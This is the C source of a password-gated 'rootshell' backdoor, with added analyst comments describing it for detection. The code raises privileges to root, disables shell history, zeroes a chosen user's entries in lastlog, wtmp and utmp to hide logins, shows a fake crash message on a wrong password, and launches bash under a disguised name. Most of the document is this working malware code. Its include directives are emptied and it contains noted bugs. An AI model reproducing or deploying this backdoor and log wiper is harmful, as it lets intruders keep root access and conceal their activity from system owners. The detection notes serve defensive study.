/*
 * rsh-v2 rootshell by rotor
 * http://www.c1zc0.com irc.efnet.org #c1zc0
 * usage: ./rshv2
 */

/*
 * Analyst notes (what the listing below does, for triage and detection):
 *
 *  - Password-gated launcher: argv[1] is compared with the hard-coded PASS
 *    string; on a match the program calls setuid(0), zeroes the login
 *    accounting records of the user named in argv[2], and execs /bin/bash.
 *  - setuid(0) can only take effect when the process already runs with root
 *    privilege (for example an installed setuid-root binary); how the binary
 *    gets there is not shown on this page.
 *  - Every string literal in this file (PASS, the fake "Segmentation fault"
 *    text, the "Cleaning ..." banners, the three accounting paths) is stored
 *    in plain text and is usable as a static signature.
 *  - Records are overwritten in place with zero bytes, never removed, so the
 *    accounting files keep their size and contain all-zero records after a run.
 *    File-integrity monitoring or audit rules on the three paths below, plus a
 *    routine inventory of setuid-root binaries, cover the behaviour seen here.
 */

/* Header names were lost when the page was extracted; the eight directives
 * are kept exactly as they appear. */
#include
#include
#include
#include
#include
#include
#include
#include

/* Plain-text password expected in argv[1]. */
#define PASS "c1zk0"
/* Login accounting files that get modified. */
#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

/*
 * Entry point.
 *
 * argv[1] is the password and argv[2] the account name whose records are
 * zeroed. On a password mismatch the program prints a fake crash message and
 * exits; on a match it raises privileges, edits lastlog/wtmp/utmp, prints
 * host information from uname() and replaces itself with /bin/bash.
 */
int main(int argc, char **argv[]) {
    /* argv[1] is read before any argument-count check. */
    char *pass = argv[1];
    char *pazz = PASS;
    struct utsname u;

    uname(&u);

    /* Decoy: the text imitates a crash, but the process exits normally with
     * status 0 rather than being killed by a signal, which a real
     * segmentation fault would be. */
    if(argc < 1){
        printf("Segmentation fault (core dumped)\n");
        exit(0);
    }

    /* strcmp() returns non-zero on mismatch: same decoy for a wrong password. */
    if(strcmp(pass, pazz)) {
        printf("Segmentation fault (core dumped)\n");
        exit(0);
    }
    else {
        /* Return values are not checked; the call is issued twice. */
        setuid(0);
        setuid(0);

        /* HISTFILE is removed from the environment inherited by the shell
         * started below, so shell history is not a dependable record of the
         * session; process/exec auditing is. */
        unsetenv("PS1");
        unsetenv("HISTFILE");

        printf("Cleaning lastlog!\n");
        clean_last(_PATH_LASTLOG, argv[2]);
        printf("Cleaning WTMP\n");
        wtmp_clean(_WTMP_PATH, argv[2]);
        printf("Cleaning UTMP\n");
        wtmp_clean(_UTMP_PATH, argv[2]);

        printf("Checking for root logged in\n");
        chkr();

        printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
        printf("Release: %s, Version: %s\n", u.release, u.version);

        /* The executable is /bin/bash but argv[0] is "sh": the name shown in
         * a process listing differs from the image actually running. */
        execl("/bin/bash", "sh", NULL);
    }
    return 0;
}

/*
 * Zero one user's record in the lastlog file.
 *
 * path: lastlog file to open for update ("r+").
 * user: account name, resolved to a UID with getpwnam().
 *
 * The record offset is pw_uid * sizeof(struct lastlog); a zeroed struct is
 * written at that offset. Returns 0 when the file cannot be opened or the
 * user is unknown; the success path ends without a return statement.
 * The stream is not closed on the unknown-user path, and `count` is unused.
 */
int clean_last(char *path, char *user) {
    FILE *lastlog_file;
    struct passwd *pwd;
    struct lastlog lastlog_tmp;
    int count=0;

    if((lastlog_file = fopen(path, "r+")) == NULL) {
        printf("failed to open file %s\n", path);
        return 0;
    }
    if ((pwd = getpwnam(user)) == NULL) {
        printf("user %s not found\n", user);
        return 0;
    }

    /* Position on the slot belonging to this UID. */
    fseek(lastlog_file, (long)(pwd->pw_uid*sizeof(lastlog_tmp)), SEEK_SET);
    /* Overwrite the slot with zero bytes; results of fseek/fwrite are ignored. */
    bzero((char *)&lastlog_tmp, sizeof(lastlog_tmp));
    fwrite((char *)&lastlog_tmp, sizeof(lastlog_tmp), 1, lastlog_file);
    fclose(lastlog_file);
    printf("%s cleaned!\n", path);
}

/*
 * Zero every record for one user in a utmp-format file (used for both the
 * wtmp and utmp paths).
 *
 * path: file to open for update ("r+").
 * user: account name compared against each record's ut_name with strcmp().
 *
 * The file is read one struct utmp at a time; each matching record is
 * overwritten in place with zero bytes, so the file length does not change
 * and zero-filled records stay behind at the original positions. Returns 0
 * when the file cannot be opened; other paths end without a return statement.
 */
int wtmp_clean(char *path, char *user) {
    FILE *uwtmp_file;
    struct utmp uwtmp_tmp;
    int count=0;

    if((uwtmp_file = fopen(path, "r+")) == NULL) {
        printf("failed to open file %s\n", path);
        return 0;
    }

    while(fread((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file) > 0) {
        if(strcmp(uwtmp_tmp.ut_name, user) ==0) {
            /* Step back over the record just read, then blank it. */
            fseek(uwtmp_file, -sizeof(uwtmp_tmp), SEEK_CUR);
            bzero(&uwtmp_tmp, sizeof(uwtmp_tmp));
            fwrite((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file);
            count++;
        }
    }
    fclose(uwtmp_file);

    /* The format string has one %s; the extra `path` argument is not printed. */
    if(count == 0) {
        printf("user %s not found\n", user, path);
    }
    else printf("%s cleaned!\n", path);
}

/*
 * Walk the utmp database with setutent()/getutent() and print a summary of
 * USER_PROCESS entries.
 *
 * As written, the `if` that compares ut_user with "root" ends in a semicolon,
 * so the braced block after it runs for every USER_PROCESS entry: the
 * "Caution>" line is printed for each login and rootcount always equals
 * logincount.
 */
void chkr() {
    struct utmp *entry;
    int logincount=0, rootcount=0;

    setutent();
    while ((entry = getutent())!=NULL) {
        /* Only interactive login records are counted. */
        if(entry->ut_type != USER_PROCESS) continue;
        logincount++;
        if(!strcmp(entry->ut_user, "root")); {
            printf("Caution> root is logged in on %s!\n", entry->ut_line);
            rootcount++;
        }
    }
    printf("-> %d user(s) logged in, %d root login(s)\n", logincount, rootcount);
    endutent();
}